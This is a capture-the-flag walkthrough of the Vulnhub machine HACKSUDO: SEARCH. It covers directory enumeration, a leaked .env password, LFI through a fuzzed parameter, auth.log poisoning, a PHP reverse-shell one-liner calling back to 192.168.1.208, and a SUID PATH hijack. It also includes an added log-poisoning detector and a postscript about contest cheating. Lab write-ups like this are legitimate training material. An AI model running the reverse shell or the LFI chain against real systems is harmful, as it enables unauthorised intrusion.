Vulnhub: HACKSUDO: SEARCH
This is HACKSUDO: SEARCH from Vulnhub. It says:
This box should be easy. This machine was created for the InfoSec Prep Discord Server (https://discord.gg/7ujQrt393b)
Ports
SSH and HTTP only.
Web
The basic dirsearch:
python3 /opt/dirsearch/dirsearch.py -u http://192.168.1.209
gives me a few things, including this:
[06:23:34] 200 - 306B - /.env
And in there are some creds and other stuff:
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_USERNAME=hiraman
DB_PASSWORD=MyD4dSuperH3r0!
Note that we didn’t have an open SQL port, though. We need a bigger feroxbuster search:
feroxbuster -u http://192.168.1.209 -w /usr/share/seclists/Discovery/Web-Content/big.txt -C 403 -x php,txt
to find this:
200 137l 288w 2918c http://192.168.1.209/search1.php
Which is what we want. Here, we find this hilarious link:
http://192.168.1.209/search1.php?FUZZ=contact.php
Along with the comment:
find me @hacksudo.com/contact @fuzzing always best option
Well, we had better do what the man says. I use Burp Suite Turbo Intruder with /usr/share/seclists/Discovery/Web-Content/common.txt as the wordlist, and find that the parameter we want is ‘me’.
LFI
So we have LFI at http://192.168.1.209/search1.php?me=/etc/passwd
A bit of enumeration reveals that we cannot read the Apache logs, but we can read /var/log/auth.log, so we poison it via SSH:
And then I think I used the PHP one-liner for a shell. I tried a few before one worked; I think this one did:
/search1.php?me=/var/log/auth.log&cmd=php+-r+'$sock%3dfsockopen("192.168.1.208",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b'
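As an added defender’s example, not part of the original walkthrough: a small Python scanner that reads auth.log and flags sshd entries whose username carries PHP code, which is exactly what log poisoning leaves behind for an LFI like the one above to include. The log lines are constructed samples; the hostname, PIDs and addresses are made up.

```python
import re

# Constructed sample auth.log excerpt (not from the box): two benign sshd
# entries and one login attempt where the "username" is PHP code.
SAMPLE_AUTH_LOG = """\
Apr 30 06:40:01 search sshd[1201]: Accepted password for hiraman from 192.168.1.50 port 50211 ssh2
Apr 30 06:41:17 search sshd[1209]: Invalid user <?php phpinfo(); ?> from 192.168.1.208 port 41022
Apr 30 06:41:19 search sshd[1209]: Failed password for invalid user <?php phpinfo(); ?> from 192.168.1.208 port 41022 ssh2
Apr 30 06:42:03 search sshd[1215]: Invalid user admin from 10.0.0.7 port 39914
"""

# sshd writes the client-supplied username verbatim into auth.log; these two
# patterns pull it out of the "Invalid user" and "Failed password" forms.
USER_PATTERNS = [
    re.compile(r"Invalid user (?P<user>.*?) from (?P<src>\S+)"),
    re.compile(r"Failed password for invalid user (?P<user>.*?) from (?P<src>\S+)"),
]

# Markers that have no business in a login name but are what a PHP include()
# of the log file would execute: open tags, request superglobals, exec calls.
PHP_MARKERS = re.compile(
    r"<\?(php|=)?|\$_(GET|POST|REQUEST|COOKIE)\b"
    r"|\b(system|passthru|shell_exec|exec|eval)\s*\(",
    re.I,
)


def find_poisoned_entries(log_text):
    """Return (line_no, username, source_ip) for every sshd line whose
    username looks like injected PHP rather than a login name."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        if "sshd[" not in line:
            continue
        for pat in USER_PATTERNS:
            m = pat.search(line)
            if m and PHP_MARKERS.search(m.group("user")):
                findings.append((line_no, m.group("user"), m.group("src")))
                break
    return findings


if __name__ == "__main__":
    for line_no, user, src in find_poisoned_entries(SAMPLE_AUTH_LOG):
        print(f"line {line_no}: PHP in SSH username from {src}: {user!r}")
```

On a real host the same check should run over the live file and the rotated copies, since the include only needs the code to be present in whichever log the web server can read.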
Privesc
Remember that password from before? Yeah.
I knew we’d get there eventually. Now what?
So it’s an SUID binary that calls ‘install’ without an absolute path. Create our own ‘install’, put its directory at the front of PATH, export it and call the binary; no problem.
Postscript
I’ve been banging my head against Year of the Jellyfish at THM and I just want to say a few words about it. It’s described thus:
This box is part of an OSCP voucher giveaway (prize kindly donated by @q8fawazo)! Root the box before 6PM UTC on the 30th of April 2021 to be entered into the prize draw. The winner will be chosen by raffle at that time, streamed and announced in the TryHackMe Discord server, so please make sure to join and verify if you wish to be entered in the competition. If you do not want to be entered, or are ineligible to use the voucher (under 18 years old, or already OSCP certified / have access to the PEN-200 (PWK) Materials), please ping @MuirlandOracle in the help channel for this room on the Discord to discuss this. There are also 5 One Month TryHackMe Subscription Vouchers to be given away in the same fashion (courtesy of @Virtual_Lad)
It goes without saying that any signs of cheating will result in an immediate and permanent ban – both from the competition and from the site/community.
I’ve got a shell and the first of two flags, but I haven’t rooted it (yet). I don’t consider myself ready for OSCP and I don’t want the voucher, but it’s a tasty challenge to try to complete anyway.
But I’ve been following the conversation in the Discord about it, and apparently people are now cheating: someone has figured it out and has told others how to do it. The foothold is easy once you’ve figured out how, but I don’t know what root is, although I gather it’s unusual; I haven’t been able to figure it out yet. But let’s say you cheat and:
- get away with it, and
- win the voucher
Now what? Surely if you have to cheat to solve this thing, then OSCP will crush you. And if you’ve got the skills to solve the challenge but are so lazy you can’t be bothered, WTF? I honestly don’t understand. Anyway, I got sick of it, so I went and did this Vulnhub box instead.